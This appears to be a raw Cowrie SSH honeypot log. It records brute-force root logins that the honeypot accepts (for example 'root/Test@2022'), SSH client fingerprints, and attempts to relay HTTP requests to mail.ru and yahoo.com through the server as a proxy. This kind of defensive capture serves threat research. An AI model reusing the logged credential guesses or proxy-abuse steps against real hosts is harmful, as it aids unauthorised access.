{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:50.978186Z","src_ip":"77.83.207.83","session":"fdecfbc23502"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":5778,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5778","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.120650Z","session":"fdecfbc23502"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.170892Z","src_ip":"77.83.207.83","session":"fdecfbc23502"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35096,"dst_ip":"1.2.3.4","dst_port":22,"session":"c84cfcd5a1e2","protocol":"ssh","message":"New connection: 212.227.235.229:35096 (1.2.3.4:22) [session: c84cfcd5a1e2]","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.179289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.180053Z","src_ip":"212.227.235.229","session":"c84cfcd5a1e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":24227,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24227","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.312547Z","session":"fdecfbc23502"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.362768Z","src_ip":"77.83.207.83","session":"fdecfbc23502"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.414162Z","src_ip":"77.83.207.83","session":"fdecfbc23502"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.431919Z","src_ip":"212.227.235.229","session":"c84cfcd5a1e2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57833,"dst_ip":"1.2.3.4","dst_port":22,"session":"095a631747ff","protocol":"ssh","message":"New connection: 77.83.207.83:57833 (1.2.3.4:22) [session: 095a631747ff]","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.462596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.463224Z","src_ip":"77.83.207.83","session":"095a631747ff"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.512951Z","src_ip":"77.83.207.83","session":"095a631747ff"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.760637Z","src_ip":"77.83.207.83","session":"095a631747ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23697,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23697","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.810972Z","session":"095a631747ff"}
{"eventid":"cowrie.session.closed","duration":"32.4","message":"Connection lost after 32.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.842551Z","src_ip":"212.227.235.229","session":"8a51d14d90b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.860418Z","src_ip":"77.83.207.83","session":"095a631747ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":598,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:598","sensor":"my-vps","timestamp":"2025-08-31T03:46:51.999768Z","session":"095a631747ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.049271Z","src_ip":"77.83.207.83","session":"095a631747ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":11942,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11942","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.192021Z","session":"095a631747ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.241729Z","src_ip":"77.83.207.83","session":"095a631747ff"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.291918Z","src_ip":"77.83.207.83","session":"095a631747ff"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57908,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f1c2c35d4ee","protocol":"ssh","message":"New connection: 77.83.207.83:57908 (1.2.3.4:22) [session: 9f1c2c35d4ee]","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.341537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.342419Z","src_ip":"77.83.207.83","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.392617Z","src_ip":"77.83.207.83","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.475605Z","src_ip":"212.227.235.229","session":"c84cfcd5a1e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.642932Z","src_ip":"77.83.207.83","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6446,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:6446","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.693945Z","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.732755Z","src_ip":"212.227.235.229","session":"c84cfcd5a1e2"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abc123","message":"login attempt [hadoop/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.742621Z","src_ip":"212.227.235.229","session":"488f6442384c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.744995Z","src_ip":"77.83.207.83","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22064,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22064","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.888530Z","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:52.938758Z","src_ip":"77.83.207.83","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":21406,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21406","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.080457Z","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.130542Z","src_ip":"77.83.207.83","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.181316Z","src_ip":"77.83.207.83","session":"9f1c2c35d4ee"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57993,"dst_ip":"1.2.3.4","dst_port":22,"session":"b349b12247e9","protocol":"ssh","message":"New connection: 77.83.207.83:57993 (1.2.3.4:22) [session: b349b12247e9]","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.231438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.232382Z","src_ip":"77.83.207.83","session":"b349b12247e9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.283675Z","src_ip":"77.83.207.83","session":"b349b12247e9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.540312Z","src_ip":"77.83.207.83","session":"b349b12247e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1116,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1116","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.592769Z","session":"b349b12247e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.644100Z","src_ip":"77.83.207.83","session":"b349b12247e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":21081,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:21081","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.789885Z","session":"b349b12247e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.841312Z","src_ip":"77.83.207.83","session":"b349b12247e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":30361,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30361","sensor":"my-vps","timestamp":"2025-08-31T03:46:53.985849Z","session":"b349b12247e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.037256Z","src_ip":"77.83.207.83","session":"b349b12247e9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.089259Z","src_ip":"77.83.207.83","session":"b349b12247e9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58097,"dst_ip":"1.2.3.4","dst_port":22,"session":"021617c6e0ff","protocol":"ssh","message":"New connection: 77.83.207.83:58097 (1.2.3.4:22) [session: 021617c6e0ff]","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.138136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.139152Z","src_ip":"77.83.207.83","session":"021617c6e0ff"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.189156Z","src_ip":"77.83.207.83","session":"021617c6e0ff"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.437370Z","src_ip":"77.83.207.83","session":"021617c6e0ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3687,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3687","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.488213Z","session":"021617c6e0ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.538233Z","src_ip":"77.83.207.83","session":"021617c6e0ff"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.561749Z","src_ip":"212.227.235.229","session":"488f6442384c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16204,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16204","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.680211Z","session":"021617c6e0ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.730055Z","src_ip":"77.83.207.83","session":"021617c6e0ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":1913,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1913","sensor":"my-vps","timestamp":"2025-08-31T03:46:54.872281Z","session":"021617c6e0ff"}
